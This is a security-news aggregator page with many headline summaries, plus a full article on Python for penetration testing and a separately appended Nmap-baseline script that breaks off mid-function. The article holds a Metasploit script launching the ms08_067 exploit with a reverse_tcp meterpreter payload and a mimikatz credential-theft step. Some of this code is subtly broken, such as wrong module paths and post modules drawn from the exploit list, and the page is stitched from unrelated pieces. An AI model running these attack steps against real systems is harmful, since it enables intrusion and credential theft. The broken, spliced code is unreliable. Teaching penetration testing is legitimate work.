AguardNet's Space Management System does not properly validate user input, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read, modify, and delete database contents.

LATEST NEWS

The latest news of links.

2024-07-25 15:28:00

Webinar: Securing the Modern Workspace: What Enterprises MUST Know about Enterprise Browser Security

The browser is the nerve center of the modern workspace. Ironically, however, the browser is also one of the least protected threat surfaces of the modern enterprise. Traditional security tools provide little protection against browser-based threats, leaving organizations exposed. Modern cybersecurity requires a new approach based on the protection of the browser itself, which offers both

by The Hacker News

2024-07-25 13:59:00

Researchers Reveal ConfusedFunction Vulnerability in Google Cloud Platform

Cybersecurity researchers have disclosed a privilege escalation vulnerability impacting Google Cloud Platform's Cloud Functions service that an attacker could exploit to access other services and sensitive data in an unauthorized manner. Tenable has given the vulnerability the name ConfusedFunction. "An attacker could escalate their privileges to the Default Cloud Build Service Account and

by The Hacker News

2024-07-25 11:17:00

Critical Docker Engine Flaw Allows Attackers to Bypass Authorization Plugins

Docker is warning of a critical flaw impacting certain versions of Docker Engine that could allow an attacker to sidestep authorization plugins (AuthZ) under specific circumstances. Tracked as CVE-2024-41110, the bypass and privilege escalation vulnerability carries a CVSS score of 10.0, indicating maximum severity. "An attacker could exploit a bypass using an API request with Content-Length set

by The Hacker News

2024-07-25 11:00:00

CISA Warns of Exploitable Vulnerabilities in Popular BIND 9 DNS Software

The Internet Systems Consortium (ISC) has released patches to address multiple security vulnerabilities in the Berkeley Internet Name Domain (BIND) 9 Domain Name System (DNS) software suite that could be exploited to trigger a denial-of-service (DoS) condition. "A cyber threat actor could exploit one of these vulnerabilities to cause a denial-of-service condition," the U.S. Cybersecurity and

by The Hacker News

2024-07-25 10:51:00

New Chrome Feature Scans Password-Protected Files for Malicious Content

Google said it's adding new security warnings when downloading potentially suspicious and malicious files via its Chrome web browser. "We have replaced our previous warning messages with more detailed ones that convey more nuance about the nature of the danger and can help users make more informed decisions," Jasika Bawa, Lily Chen, and Daniel Rubery from the Chrome Security team said. To that

by The Hacker News

2024-07-25 10:00:55

IR Trends: Ransomware on the rise, while technology becomes most targeted sector

Although there was a decrease in BEC engagements from last quarter, it was still a major threat for the second quarter in a row.

by Cisco Talos Blog

2024-07-25 10:00:55

AI Tool Identifies BOLA Vulnerabilities in Easy!Appointments

We explain how an automated BOLA detection tool harnessing GenAI discovered multiple BOLA vulnerabilities in open-source scheduling tool Easy!Appointments. The post AI Tool Identifies BOLA Vulnerabilities in Easy!Appointments appeared first on Unit 42.

by Palo Alto Networks - Unit42

2024-07-25 10:00:23

Buy a Microsoft Visual Studio Pro license for 90% off

Code faster and work smarter with a Microsoft Visual Studio Professional 2022 license, now on sale for $45.

by ZDNET Security

2024-07-25 09:52:06

Learning from CrowdStrike’s quality assurance failures

CrowdStrike has released a preliminary Post Incident Review (PIR) of how the flawed Falcon Sensor update made its way to millions of Windows systems and pushed them into a “Blue Screen of Death” loop. The PIR is a bit confusing to read and parse, because it attempts to assure readers that the company carefully and comprehensively tests their products – even though the company’s failures on that front are obvious. Here is the heart of … More → The post Learning from CrowdStrike’s quality assurance failures appeared first on Help Net Security.

by Help Net Security

2024-07-25 09:41:23

From Code to Threat Intel: How GitHub Monitoring Enhances Security Postures

In today’s interconnected digital world, platforms like GitHub have become indispensable for developers. They enable seamless collaboration, effective version control, and streamlined continuous integration and deployment (CI/CD) processes. However, this accessibility and openness also make these platforms attractive targets for cybercriminals. These bad actors exploit GitHub to introduce vulnerabilities, steal sensitive information, or inject malicious […] The post From Code to Threat Intel: How GitHub Monitoring Enhances Security Postures appeared first on ThreatMon Blog.

by ThreatMon

2024-07-25 09:38:44

Over Half of UK Workers Haven’t Received Training on Avoiding Phishing Scams

Security Awareness pros KnowBe4 have published findings on cybersecurity training among UK employees and the adoption of ‘best practice’ policies by organisations. The report, entitled ‘UK Cybersecurity Practices at Work’, highlights the various cybersecurity threats faced by modern organisations and expresses concern over the insufficient training received by employees across the UK. According to the […] The post Over Half of UK Workers Haven’t Received Training on Avoiding Phishing Scams appeared first on IT Security Guru.

by IT Security Guru

2024-07-25 09:16:16

Thread Name-Calling – using Thread Name for offense

Research by: hasherezade Highlights: Introduction Process injection is one of the important techniques used by attackers. We can find its variants implemented in almost every malware. It serves purposes such as: Due to the fact that interference in the memory of a process by malicious modules can cause a lot of damage, all sorts of AV […] The post Thread Name-Calling – using Thread Name for offense appeared first on Check Point Research.

by Check Point Research

2024-07-25 09:00:30

CAST SBOM Manager automates creation and handling of SBOMs

CAST launched CAST SBOM Manager, a new freemium product designed for product owners, release managers, and compliance specialists. CAST SBOM Manager automates and simplifies the creation and handling of Software Bill of Materials (SBOMs), which North American and European governments now regularly require from their software providers. As the software supply chain faces unprecedented threats, maintaining accurate SBOMs has become critical for any organization that supplies software especially regulated device manufacturers with embedded software, government … More → The post CAST SBOM Manager automates creation and handling of SBOMs appeared first on Help Net Security.

by Help Net Security

2024-07-25 09:00:00

Google Boosts Chrome Protections Against Malicious Files

Google has announced improved protections for Chrome users when downloading files from the internet. The post Google Boosts Chrome Protections Against Malicious Files appeared first on SecurityWeek.

by SecurityWeek

2024-07-25 08:52:01

The Cyber Express Partners with Black Hat 2024 Desi Gala: A Night for Cybersecurity Leaders

July 25, 2024: The Cyber Express (TCE) is excited to announce its media partnership with the highly anticipated Black Hat 2024 Desi Gala Event, hosted by Suraksha Catalyst. This premier event promises to be an evening of networking, knowledge sharing, celebration, and plenty of fun. Exclusively bringing together CISOs, cybersecurity practitioners, and entrepreneurs, the Desi Gala Event, in collaboration with DSCI, a NASSCOM Initiative, will take place on August 6, 2024, in Las Vegas.

Esteemed Speakers and Sponsors at Black Hat 2024 Desi Gala Event

Get ready to be inspired by a lineup of top-notch speakers, including:

- Venkatesh Murthy, Senior Director at Data Security Council of India
- Dipesh Ranjan, Chief Partner Officer, SVP Global Growth & Sales - Americas, ANZ & Europe at Cyble Inc.
- Rohit Kohli, Aruneesh Salhotra, and Ankur Ahuja, Founding Advisors of Suraksha Catalyst.

These esteemed speakers will deliver valuable insights into the ever-evolving cybersecurity landscape. And let’s not forget the fantastic sponsors making this event possible: Cyble, Palo Alto Networks, Risk Profiler, AppSOC, and Inspira.

A Unique Networking Platform

The Desi Gala Event is known for its engaging atmosphere and high-profile attendees. It’s a unique platform for cybersecurity professionals to connect, collaborate, and explore transformative opportunities. Expect an evening packed with insightful discussions, delectable food, and drinks. But that’s not all—get ready to hit the dance floor because the night will end with a Bollywood DJ night! It's not just about business; it's also about having a blast.

Suraksha Catalyst: Bridging Indo-American Cybersecurity Leaders

Suraksha Catalyst is dedicated to bringing together the Indo-American Cyber Alliance to foster collaboration, growth, and strategic partnerships. By uniting influential players from both nations, Suraksha Catalyst aims to unlock new avenues for innovation and business expansion, fortifying the cybersecurity landscape across India and the US.

Key Initiatives by Suraksha Catalyst:

- Building strong relationships with over 500 cybersecurity leaders and industry associations in India and the US.
- Facilitating insight exchange to boost CISO resilience and innovation.
- Attracting investments into Indo-American cybersecurity portfolios.
- Strong vetting of portfolio companies by security practitioners.
- Connecting industry leaders for strategic partnerships.

The Founding Advisors of Suraksha Catalyst include Ankur Ahuja, Rohit Kohli, and Aruneesh Salhotra, all of whom bring extensive experience in cybersecurity leadership.

Exclusive and Invitation-Only Event

The Black Hat 2024 Desi Gala Event is an exclusive, invitation-only gathering reserved solely for CISOs and cybersecurity practitioners. This exclusivity ensures a highly focused and relevant audience, enhancing the quality of interactions and discussions. For more information, please contact info@surakshacatalyst.com.

About The Cyber Express

The Cyber Express is a leading publication dedicated to providing news and analysis about the information security industry. As a trusted resource for information security professionals, business leaders, ethical hackers, dark web researchers, cybersecurity influencers, and students, The Cyber Express delivers the latest trends and developments in the field. Through its media partnership with the Black Hat 2024 Desi Gala Event, The Cyber Express continues to support and amplify the voices of cybersecurity professionals worldwide.

About Suraksha Catalyst

Suraksha Catalyst, Indo-American Cyber Alliance is committed to fostering collaboration between Indo-American cybersecurity leaders and companies, driving growth, and creating strategic partnerships to enhance the global cybersecurity landscape. By connecting influential players from both nations, Suraksha Catalyst opens new avenues for innovation and business expansion. They achieve this by building strong relationships with over 500 cybersecurity leaders and industry associations in India and the US, facilitating insight exchange to boost CISO resilience and innovation, attracting investments into Indo-American cybersecurity portfolios, rigorously vetting portfolio companies, and connecting industry leaders for strategic partnerships.

Contact Info:

Suraksha Catalyst: Mirinalilee Singh, Community Manager, milee@surakshacatalyst.com or info@surakshacatalyst.com

Media Contact: The Cyber Express, Priti Chaubey, Communications Manager, priti.c@thecyberexpress.com

by The Cyber Express

2024-07-25 08:28:21

Phone Lines Down in Multiple Courts Across California After Ransomware Attack

Phone lines down in multiple courts across California after ransomware attack on state’s largest trial court in Los Angeles County. The post Phone Lines Down in Multiple Courts Across California After Ransomware Attack appeared first on SecurityWeek.

by SecurityWeek

2024-07-25 08:27:35

Phishing Attacks Hit Guernsey: ODPA Calls for Enhanced Cybersecurity Measures

In response to a notable increase in cyberattacks on Guernsey, the Office of the Data Protection Authority (ODPA) has issued a stern advisory urging heightened vigilance and enhanced security measures. Specifically, there has been a rise in phishing attacks targeting Microsoft 365 systems and launching cyberattacks on Guernsey. The perpetrators deceive users into divulging sensitive information via email. The ODPA highlighted concerns over the growing sophistication of cybercriminals, who are adept at circumventing standard security protocols, including multi-factor authentication (MFA). While MFA is widely regarded as an effective deterrent against account compromises, recent incidents have demonstrated that it was bypassed, highlighting the need for additional protective layers.

The Rise of Cyberattacks on Guernsey

"Organizations must adopt a layered approach to cybersecurity," emphasized the ODPA, recommending comprehensive measures such as robust mail and web filtering, alongside rigorous staff training to enhance awareness of phishing tactics. This cautionary stance follows recent cyberattacks on Guernsey, targeting its IT network, and temporarily disrupting services including email and Microsoft Teams access for deputies. Prompt action by IT officials mitigated potential risks, preventing any compromise of data or systems. Despite the incident's resolution, concerns were raised by Deputy Mark Helyar regarding the handling of password resets and communication protocols during the disruption. "We signed a significant contract with Agilisys for IT support, yet the response to this incident raises questions about its adequacy and efficacy," voiced Deputy Helyar, reflecting broader dissatisfaction among officials regarding the incident management process.

ODPA Shares Mitigation Against Guernsey Cyberattacks

In response to these Guernsey cyberattacks, the ODPA has reiterated its guidance on mitigating phishing risks, emphasizing a proactive approach. They advise approaching all communications and requests with caution, irrespective of apparent legitimacy. Scrutinizing messages for common indicators of phishing attempts, such as urgent calls to action or unfamiliar sender details, is crucial. It's also recommended that requests, particularly those involving sensitive information, be verified before responding. Additionally, confirming the legitimacy of suspicious messages through direct contact with purported senders via established channels is encouraged. The ODPA's comprehensive guidelines aim to empower organizations and individuals to better safeguard against these state cyberattacks. By promoting a proactive security posture and fostering a culture of cyber-awareness, Guernsey seeks to bolster its resilience against future cyber threats. For more detailed information on protecting against phishing attacks and enhancing cybersecurity measures, organizations are encouraged to visit the ODPA's official website. Stay informed, stay vigilant, and stay secure against cyberattacks on Guernsey and its people.

by The Cyber Express

2024-07-25 08:00:14

Lakera raises $20 million to secure GenAI applications

Lakera has raised $20 million in a Series A funding round. Led by European VC Atomico, with participation from Citi Ventures, Dropbox Ventures, and existing investors including redalpine, this investment brings Lakera’s total funding to $30 million. This funding positions Lakera at the forefront of the global economy’s race to secure GenAI applications. As part of this round, Atomico Partner Sasha Vidiborskiy will join Lakera’s board. It’s been predicted that by 2026, 80% of enterprises … More → The post Lakera raises $20 million to secure GenAI applications appeared first on Help Net Security.

by Help Net Security

2024-07-25 07:35:36

Nvidia Patches High-Severity Vulnerabilities in AI, Networking Products

Nvidia has patched high-severity vulnerabilities in its Jetson, Mellanox OS, OnyX, Skyway, and MetroX products. The post Nvidia Patches High-Severity Vulnerabilities in AI, Networking Products appeared first on SecurityWeek.

by SecurityWeek

2024-07-25 06:51:10

BIND 9.20 released: Enhanced DNSSEC support, application infrastructure improvements

BIND (Berkeley Internet Name Domain) is an open-source DNS software system with an authoritative server, a recursive resolver, and related utilities. BIND 9.20, a stable branch suitable for production use, has been released. According to the current software release plan, this branch will be supported for four years – until the first quarter of 2028. Who uses BIND? Major financial institutions National and international carriers Regional and community ISPs Retailers, manufacturers Universities and educational networks … More → The post BIND 9.20 released: Enhanced DNSSEC support, application infrastructure improvements appeared first on Help Net Security.

by Help Net Security

2024-07-25 06:38:31

Mimecast Expands Platform, Acquires Code42 for Advanced Insider Threat Management

Mimecast, a global Human Risk Management (HRM) platform, has announced its acquisition of Code42, a prominent name in insider threat management and data loss prevention. Founded in 2001 and headquartered in Minneapolis, Minnesota, Code42 has been instrumental in shaping the insider risk management category. Its solutions are FEDRAMP-authorized and can be configured for compliance with GDPR, HIPAA, PCI, and other frameworks. Financial terms of the deal have not been disclosed. However, this strategic move signifies Mimecast’s commitment to transforming how organizations handle human-centered security risks. Marc van Zadelhoff, Chief Executive Officer of Mimecast, highlighted the importance of this acquisition, stating, “Mimecast’s platform stands out in our crowded industry by focusing specifically on the critical moment of risk—a person opening their laptop. Unlike fragmented point solutions, Mimecast provides a connected approach that is engineered to offer complete visibility and strategic insight across customers’ ecosystems, enabling intervention that helps them prevent costly incidents caused by insider risk and data exfiltration. Integrating leading solutions like Code42 broadens and deepens our proven security and human risk management capabilities.” Enhancing Cloud-Native Security Capabilities Code42 is renowned for its cloud-native insider threat management and data loss prevention capabilities. These tools help businesses protect critical data from exposure, loss, leak, and theft while speeding up incident response times. With this acquisition, businesses will gain comprehensive visibility and strategic insight across an expanding attack surface, enhancing their ability to manage and mitigate security threats. Joe Payne, President & CEO of Code42, emphasized the importance of employee collaboration in modern organizations. 
“Protecting organizations from data exfiltration requires enhanced visibility into risky user activities across email, collaboration platforms, web, cloud, and more. By joining forces with Mimecast, we can help customers quickly detect and respond to threats across their expansive digital environments.” This acquisition aligns with Mimecast’s strong strategy to address human risk. Recently, the company unveiled its connected HRM platform and Mimecast Engage™ human risk awareness and training offering. These initiatives stemmed from the integration of Elevate Security technology, which Mimecast acquired in December 2023. Mimecast will continue to support Code42’s existing customer base, and Code42's Incydr™ product is now available to Mimecast customers, with plans to integrate these capabilities into the Mimecast platform over the coming months. The sale was facilitated by Piper Sandler & Co., who advised Code42.

Mimecast Unified Approach to Cyber Threats

Mimecast’s AI-powered, API-enabled connected HRM platform is designed to protect organizations from a wide range of cyber threats. The platform enhances visibility and provides strategic insights that enable decisive actions, helping businesses protect their collaborative environments, safeguard critical data, and engage employees in reducing risk and boosting productivity. The integration of Code42’s capabilities into Mimecast’s HRM platform is expected to offer enhanced protection against insider threats and data loss. This collaboration aims to create a more secure and efficient digital environment for organizations, safeguarding their data while maintaining a collaborative culture among employees. By acquiring Code42, Mimecast is taking a significant step towards consolidating its position as a leader in human risk management, offering comprehensive solutions to address both insider and external threats. This acquisition not only enhances the company’s product offerings but also reinforces its commitment to helping businesses navigate the complexities of the modern threat landscape with advanced, integrated security solutions.

by The Cyber Express

2024-07-25 06:38:16

Beware! Deceptive LNK Files Used in Indian Political Espionage Campaign

Cybersecurity researchers have uncovered a sophisticated cyber espionage campaign dubbed "Operation ShadowCat". This operation, orchestrated by a suspected Russian-speaking hacker group, employs advanced techniques to infiltrate systems, primarily targeting individuals with a vested interest in Indian political affairs. ShadowCat begins with the distribution of malicious files disguised as innocuous documents related to Indian parliamentary proceedings. These files, often in the form of deceptive .LNK shortcuts masquerading as legitimate Office documents, serve as the initial point of entry for unsuspecting victims. Once executed, these shortcuts trigger a sequence of events orchestrated to deploy a stealthy Remote Access Trojan (RAT) onto the victim's machine.

Unravelling Operation ShadowCat

[Figure: Attack-Chain of Operation ShadowCat (Source: Cyble)]

According to Cyble Research and Intelligence Labs (CRIL), the infection process unfolds with a PowerShell command embedded within the .LNK file, initiating the download and execution of a .NET loader. This loader is crucial as it acts as a conduit for delivering the final payload—a RAT written in the Go programming language. This RAT is designed not only to establish persistent control over compromised systems but also to facilitate further malicious activities, including the deployment of ransomware and exfiltration of sensitive data. The cybercriminals behind ShadowCat leverage sophisticated techniques to evade detection and maintain persistence. Central to their strategy is the use of steganography—a method of concealing malicious payloads within seemingly innocuous PNG images hosted on Content Delivery Networks (CDNs). By embedding Gzip-compressed payloads within these images, the attackers ensure that the malicious code remains hidden until runtime, thereby bypassing traditional security measures.

[Figure: Malicious PowerShell script (Source: Cyble)]

Moreover, the deployment of the RAT involves intricate steps, including Asynchronous Procedure Call (APC) injection into the PowerShell.exe process. This technique allows the malware to execute its payload discreetly, leveraging the unsuspecting host system's resources without raising suspicion.

Targeted Audience and Countermeasures

The choice of lures—documents related to Indian political affairs—suggests a deliberate targeting strategy aimed at specific individuals within the political, journalistic, and analytical communities. Potential victims include government officials, political analysts, journalists, researchers, and think tanks actively monitoring and reporting on Indian parliamentary proceedings. This selective targeting highlights the strategic intent of the threat actors to acquire sensitive information and potentially influence political narratives. Interestingly, the attackers have implemented geo-location-based execution prevention mechanisms to exclude certain regions, particularly those where Russian-speaking communities reside. This geographical exclusion tactic provides further clues pointing toward the origin or affiliation of the threat actors behind the Operation. The Operation represents a sophisticated cyber espionage campaign targeting individuals interested in Indian political affairs. To defend against such threats, organizations and individuals are urged to implement rigorous cybersecurity measures. This includes enhancing email security protocols to effectively detect and quarantine suspicious attachments, especially those with .LNK extensions. Additionally, deploying advanced endpoint protection solutions is essential to identify and mitigate PowerShell-based attacks and malicious .NET loaders. Furthermore, educating users about the risks posed by phishing attacks and social engineering tactics is crucial in building resilience against cyber espionage campaigns.

by The Cyber Express

2024-07-25 05:36:43

Hacker claims theft of Piramal Group’s employee data

A hacker claims to be selling data relating to thousands of current and former employees of India's Piramal Group. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

2024-07-25 05:00:00

Pro-Palestinian Actor Levels 6-Day DDoS Attack on UAE Bank

DDoS cyberattack campaign averaged 4.5 million requests per second, putting the bank under attack 70% of the time.

by Dark Reading

2024-07-25 04:30:32

How CISOs enable ITDR approach through the principle of least privilege

Somewhere, right now, a CISO is in a boardroom making their best case for stronger identity threat detection and response (ITDR) initiatives to lower the risk of intrusion. For a good reason, too: Look no further than the Change Healthcare breach, where the BlackCat gang allegedly used stolen credentials to gain access to company systems to deploy ransomware. And Change Healthcare isn’t an isolated incident; it’s part of a growing trend. The 2024 Verizon Data … More → The post How CISOs enable ITDR approach through the principle of least privilege appeared first on Help Net Security.

by Help Net Security

2024-07-25 04:00:54

Cloud security threats CISOs need to know about

In this Help Net Security interview, Ava Chawla, Head of Cloud Security at AlgoSec, discusses the most significant cloud security threats CISOs must be aware of in 2024. These threats include data breaches, misconfiguration, insider threats, advanced persistent threats, ransomware, API vulnerabilities, and supply chain vulnerabilities. These threats impact various sectors, including finance, healthcare, and retail, and Chawla provides insights into effective mitigation strategies. What are the most significant cloud security threats CISOs must know … More → The post Cloud security threats CISOs need to know about appeared first on Help Net Security.

by Help Net Security

2024-07-25 03:30:42

Researchers expose GitHub Actions workflows as risky and exploitable

GitHub is an immensely popular platform, with over 100 million developers and over 90% of Fortune 100 companies utilizing it. Despite its widespread use, many GitHub Actions workflows remain insecure, often due to excessive privileges or high-risk dependencies. In this Help Net Security video, Roy Blit, Head of Research at Legit Security, discusses a new Legit Security State of GitHub Actions Security report. The report unveils an especially concerning security posture and reveals that most … More → The post Researchers expose GitHub Actions workflows as risky and exploitable appeared first on Help Net Security.

by Help Net Security

2024-07-25 03:00:51

The most urgent security risks for GenAI users are all data-related

Regulated data (data that organizations have a legal duty to protect) makes up more than a third of the sensitive data being shared with GenAI applications—presenting a potential risk to businesses of costly data breaches, according to Netskope. The new Netskope Threat Labs research reveals three-quarters of businesses surveyed now completely block at least one GenAI app, which reflects the desire by enterprise technology leaders to limit the risk of sensitive data exfiltration. However, with … More → The post The most urgent security risks for GenAI users are all data-related appeared first on Help Net Security.

by Help Net Security

2024-07-25 00:39:47

Cybersecurity Firm KnowBe4 Tricked into Hiring North Korean Hacker as IT Pro

Cybersecurity firm KnowBe4 was tricked by a North Korean hacker posing as an IT worker whose next step…

by Hackread

2024-07-25 00:36:22

Python for Penetration Testing: Automating Cybersecurity with Python

Harnessing the Power of Python to Strengthen Cyber Defenses and Streamline Penetration Testing Workflows

Python has become a staple language in the world of cybersecurity, particularly in the domain of penetration testing. Penetration testing, often referred to as ethical hacking, involves simulating cyber attacks to identify vulnerabilities in systems, networks, and applications before malicious actors can exploit them. Python’s simplicity, versatility, and extensive libraries make it an ideal choice for developing custom penetration testing tools and automating various phases of the testing process.

In this article, we’ll explore how Python is used in penetration testing tools and frameworks like Metasploit, Nmap, and Scapy. We’ll delve into scripting techniques for automating different phases of penetration testing, including reconnaissance, exploitation, and post-exploitation.

What Is Penetration Testing?

Penetration testing, often referred to as pen testing or ethical hacking, is a proactive cybersecurity assessment technique used to identify and exploit vulnerabilities in systems, networks, and applications. The primary objective of penetration testing is to simulate real-world cyber attacks to assess the security posture of an organization’s digital assets and infrastructure. Here’s a breakdown of the key aspects of penetration testing:

Purpose: The main purpose of penetration testing is to uncover security weaknesses before malicious actors can exploit them. By identifying vulnerabilities and misconfigurations, organizations can remediate issues and strengthen their overall security posture.

Methodology: Penetration testing typically follows a systematic approach that involves reconnaissance, scanning, exploitation, and post-exploitation activities. Testers use a variety of tools, techniques, and methodologies to simulate different types of cyber attacks, including but not limited to network attacks, web application attacks, and social engineering attacks.

Types of Penetration Testing:

- Black Box Testing: Testers have no prior knowledge of the target system and simulate an external attacker.
- White Box Testing: Testers have full knowledge of the target system, including network diagrams, source code, and architecture details.
- Gray Box Testing: Testers have partial knowledge of the target system, simulating an insider threat or a compromised user account.

Scope: Penetration testing can be conducted at various levels of the technology stack, including network infrastructure, web applications, mobile applications, cloud services, and IoT devices. The scope of a penetration test is defined based on the organization’s specific goals, assets, and risk tolerance.

Reporting: After completing the penetration testing process, testers compile a detailed report that outlines the findings, including identified vulnerabilities, exploitation techniques, and recommendations for remediation. The report provides actionable insights for stakeholders to prioritize and address security issues effectively.

Compliance and Regulations: Penetration testing is often required by regulatory frameworks and industry standards such as PCI DSS (Payment Card Industry Data Security Standard), HIPAA (Health Insurance Portability and Accountability Act), and GDPR (General Data Protection Regulation). Compliance mandates may specify the frequency and scope of penetration testing activities.

Continuous Improvement: Penetration testing is not a one-time activity but rather an ongoing process. Organizations should conduct regular penetration tests to assess their evolving security posture and ensure that new vulnerabilities are promptly identified and addressed. Continuous improvement is essential to stay ahead of emerging threats and maintain resilience against cyber attacks.

Python in Penetration Testing Tools

Metasploit: Metasploit is one of the most popular penetration testing frameworks used by cybersecurity professionals worldwide. While Metasploit is primarily written in Ruby, it provides a Python interface (msfconsole) for scripting and automation. Python scripts can be used to interact with Metasploit modules, automate exploit delivery, and perform post-exploitation tasks.

    # Example Python script to interact with Metasploit's RPC API.
    # Requires the pymetasploit3 package (pip install pymetasploit3); the older
    # pymetasploit package exposed the same class as metasploit.msfrpc.MsfRpcClient.
    from pymetasploit3.msfrpc import MsfRpcClient

    # Connect to a running msfrpcd. The first positional argument is the RPC
    # password; the host goes in server=. msfrpcd enables SSL by default.
    client = MsfRpcClient('msf', server='your-msf-host', port=55553,
                          username='msf', ssl=True)

    # List available exploit modules by name
    for exploit in client.modules.exploits:
        print(exploit)

Nmap: Nmap (Network Mapper) is a powerful open-source tool used for network discovery and security auditing. While Nmap itself is written in C and Lua, it offers Python bindings (Nmap Scripting Engine — NSE) for developing custom scripts to extend its functionality. Python scripts can be used to perform advanced network scans, detect open ports, and identify vulnerable services.

    # Example Python script using the python-nmap wrapper (pip install python-nmap);
    # the nmap binary itself must be installed and on PATH.
    import nmap

    # Create an Nmap PortScanner object
    scanner = nmap.PortScanner()

    # Scan target IP addresses for the selected ports
    scanner.scan('192.168.1.0/24', arguments='-p 22,80,443')

    # Print scan results. all_tcp() returns an empty list for hosts with no TCP
    # results instead of raising KeyError, and only ports in state 'open' are kept.
    for host in scanner.all_hosts():
        open_ports = [p for p in scanner[host].all_tcp()
                      if scanner[host]['tcp'][p]['state'] == 'open']
        print(f"Host: {host}")
        print(f"Open ports: {open_ports}")

Scapy: Scapy is a versatile packet manipulation tool written in Python. It allows cybersecurity professionals to craft custom packets, send them over the network, and analyze responses. Scapy’s flexibility makes it invaluable for conducting network reconnaissance, packet sniffing, and protocol exploitation during penetration testing engagements.

    # Example Python script using Scapy for network reconnaissance (pip install scapy).
    # Sending raw packets requires root/administrator privileges.
    from scapy.all import IP, ICMP, sr1

    # Send an ICMP echo request to a target host; the timeout keeps sr1() from
    # blocking forever when the host does not answer.
    response = sr1(IP(dst="192.168.1.1") / ICMP(), timeout=2, verbose=False)

    # Print the response
    if response:
        response.show()
    else:
        print("No response received.")

Scripting Techniques for Penetration Testing

Reconnaissance: Python scripts can automate the reconnaissance phase by gathering information about the target network, such as IP addresses, open ports, services running on those ports, and network topology. Libraries like Nmap and Scapy can be used to perform active and passive reconnaissance scans.

    # Example Python script for network reconnaissance using the python-nmap wrapper
    import nmap

    # Create an Nmap PortScanner object
    scanner = nmap.PortScanner()

    # Fast scan (-F: the 100 most common ports) with aggressive timing (-T4)
    scanner.scan('192.168.1.0/24', arguments='-T4 -F')

    # Print scan results, keeping only ports reported as open
    for host in scanner.all_hosts():
        open_ports = [p for p in scanner[host].all_tcp()
                      if scanner[host]['tcp'][p]['state'] == 'open']
        print(f"Host: {host}")
        print(f"Open ports: {open_ports}")

Exploitation: Python scripts can automate the exploitation of discovered vulnerabilities by leveraging Metasploit modules or custom exploit code.
Scripts can be developed to identify vulnerable systems, select appropriate exploits, and launch attacks against target hosts.# Example Python script for exploiting a vulnerability using Metasploit''s RPC APIfrom metasploit.msfrpc import MsfRpcClient# Connect to the Metasploit RPC serverclient = MsfRpcClient(''your-msf-host'', port=55553, username=''msf'', password=''msf'')# Get a list of available exploitsexploits = client.modules.exploits# Select an exploit (e.g., exploit/windows/smb/ms08_067_netapi)exploit = exploits.use(''exploit/windows/smb/ms08_067_netapi'')# Configure the exploit parametersexploit[''RHOST''] = ''target-ip''exploit[''PAYLOAD''] = ''windows/meterpreter/reverse_tcp''# Execute the exploitexploit.execute()Post-Exploitation:Python scripts can automate post-exploitation activities, such as privilege escalation, lateral movement, and data exfiltration, after gaining initial access to a target system. Scripts can interact with operating system APIs, manipulate files and directories, and execute commands remotely.# Example Python script for post-exploitation using Metasploit''s RPC APIfrom metasploit.msfrpc import MsfRpcClient# Connect to the Metasploit RPC serverclient = MsfRpcClient(''your-msf-host'', port=55553, username=''msf'', password=''msf'')# Get a list of available post modulespost_modules = client.modules.exploits# Select a post module (e.g., exploit/windows/local/mimikatz)post_module = post_modules.use(''exploit/windows/local/mimikatz'')# Configure the post module parameterspost_module[''SESSION''] = 1# Execute the post modulepost_module.execute()Conclusion:Python plays a crucial role in modern penetration testing, enabling cybersecurity professionals to develop custom tools and automate various phases of the testing process. By leveraging Python’s simplicity and extensive libraries, practitioners can enhance their efficiency and effectiveness in identifying and mitigating security risks. 
As cyber threats continue to evolve, Python remains an indispensable tool in the arsenal of ethical hackers and security researchers, empowering them to defend against emerging threats and protect digital assets.Python for Penetration Testing: Automating Cybersecurity with Python was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups
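The reconnaissance section of the article above prints whatever Nmap returns; in an engagement (or when a defender re-runs the same scan) the useful step is comparing results against what each host is approved to expose. The following is an added example, not code from the InfoSec Write-ups article: it parses Nmap's XML output (the `-oX` format that python-nmap also consumes) and reports open TCP ports that are not in a baseline. The XML sample and the BASELINE mapping are constructed; the host addresses are stand-ins.

```python
"""Check Nmap XML results against an approved-services baseline.

Added example (not from the original article). Assumes the scan was saved with
``nmap -oX`` and that BASELINE is the organisation's own record of which TCP
ports each host is expected to expose. All data below is constructed.
"""
import xml.etree.ElementTree as ET
from typing import Dict, List, Set, Tuple

# Constructed Nmap XML: one host with an unexpected RDP port, one host that is
# up but exposes nothing, and one host that Nmap reported as down.
SAMPLE_NMAP_XML = """
<nmaprun scanner="nmap" args="nmap -oX - -p 22,80,443,3389 192.168.1.0/24">
  <host>
    <status state="up"/>
    <address addr="192.168.1.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
      <port protocol="tcp" portid="443"><state state="closed"/><service name="https"/></port>
      <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server"/></port>
    </ports>
  </host>
  <host>
    <status state="up"/>
    <address addr="192.168.1.11" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="filtered"/><service name="ssh"/></port>
    </ports>
  </host>
  <host>
    <status state="down"/>
    <address addr="192.168.1.12" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

# Constructed baseline: the TCP ports each host is approved to expose.
BASELINE: Dict[str, Set[int]] = {
    "192.168.1.10": {22, 80},
    "192.168.1.11": {22},
}


def parse_open_tcp_ports(xml_text: str) -> Dict[str, Dict[int, str]]:
    """Return {ip: {port: service}} for every host Nmap reports as up.

    Only ports in state "open" count; "closed" and "filtered" are not exposures.
    A host that is up with nothing open still gets an empty dict, so callers never
    hit the KeyError that scanner[host]['tcp'] raises in python-nmap when a host
    has no TCP results.
    """
    results: Dict[str, Dict[int, str]] = {}
    for host in ET.fromstring(xml_text).iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # host was down; nothing to assess
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        open_ports: Dict[int, str] = {}
        for port in host.iterfind("ports/port[@protocol='tcp']"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            service = port.find("service")
            name = service.get("name", "") if service is not None else ""
            open_ports[int(port.get("portid"))] = name
        results[addr.get("addr")] = open_ports
    return results


def find_unexpected_exposure(
    scan: Dict[str, Dict[int, str]], baseline: Dict[str, Set[int]]
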